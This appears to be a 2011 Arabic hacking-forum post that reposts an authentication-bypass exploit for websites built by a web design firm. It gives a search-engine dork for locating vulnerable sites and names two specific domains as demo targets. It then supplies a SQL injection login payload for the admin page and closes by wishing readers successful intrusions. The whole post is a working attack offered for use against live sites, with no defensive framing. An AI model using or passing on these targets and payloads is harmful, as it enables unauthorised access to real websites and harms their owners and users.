ثغرة جديدة بتاريخ هذا اليوم Hyperactive PC Admin Auth Bypass

[walidcurva]

السلام عليكم

لن اطول عليكم الموضوع:

كود:

# Exploit Title:Hyperactive PC  Admin   Auth  Bypass
# Date: 17/6/2011
# Author: Angel Injection & Noor Al-Iraqia
# home Page: http://www.club-h.co.cc
# Vendor or Software Link:n/a
# Version: n/a
# Category:: webapps
# Google dork:"Website by  Hyperactive  PC, L.L.C." 
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
# 1-www.minnechauggolf.com/admin_login.asp
# 2-thecourseatyale.org/admin_login.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password :  'or''='

اختراقات موفقة.......... آسف عن الغياب :cry:

المصدر: :: vBspiders Professional Network ::

---

eyvm []d]m fjhvdo i`h hgd,l Hyperactive PC Admin Auth Bypass curva walid